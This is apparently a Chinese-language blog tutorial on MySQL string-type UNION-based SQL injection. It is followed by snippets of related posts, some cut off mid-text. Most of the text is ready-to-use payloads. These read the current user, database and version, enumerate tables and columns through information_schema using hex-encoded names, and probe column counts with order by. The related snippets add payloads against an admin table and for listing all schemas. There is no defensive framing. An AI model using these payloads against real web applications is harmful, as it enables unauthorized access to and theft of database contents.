MYSQL注入語句實用精解

2021-12-30 00:23:23 字數 1029 閱讀 9573

mysql注入語句實用精解

只講字元型。

order by xx

union select .....

1' union select 1,concat(user(),0x3a,database(),0x3a,version()) #                 這兩句是等價的。

1' union select 1,concat_ws(char(58),user(),database(),version()) #

上面是字元型的,注釋符為 #  , concat_ws 為用分隔符隔開連線的字元。

獲取資料庫等的資訊

1' union select 1,concat(table_name) from information_schema.tables where table_schema=database() #

concat產生只是字串連線,不用也可以,也應該可以把所有表輸出。table_name 和 table_schema 是 information_schema中tables表中的乙個字段。

1' union select 1,concat(column_name) from information_schema.columns where table_name=0x7573657273 #

0x7573657273這個是users的十六進製制表示形式。這個users只是乙個特例而已。主要根據上面獲得表中字段值進行查詢。到了這裡,資料庫知道了,表知道了,表的字段也知道了。剩下的還不會查嗎。直接union 查。

庫information_schema 中的表tables  有  table_schema(資料庫名) 和 table_name(表名) 兩個主要字段 

庫information_schema 中的表columns 有  table_name(表名) 和  column_name(列名) 兩主要字段

就算是 order by 出來只有乙個可以顯示也沒關係。可以用concat 

如:  concat(字段,0x3a,字段)   把兩個字段顯示出來了。中間那個是  : 的十六進製制表示形式。

mysql 報錯注入語句 mysql注入

sql的注入型別有以下5種 boolean based blind sql injection 布林型注入 error based sql injection 報錯型注入 union query sql injection 可聯合查詢注入 stacked queries sql injection ...

MYSQL注入語句

union select 1,1,1,1,1 order by 13 union select 1,2,3,4,11,12,13 from admin union select 1,version 3,13 from admin union select 1,username,3,13 from a...

mysql 注入語句

檢視mysql中所有的使用者及許可權 只有root許可權才能看 union select 1,2,3 失敗 union select 1,2,3,4 成功 檢視該使用者的所有資料庫 union select group concat schema name 2,3,4 from informatio...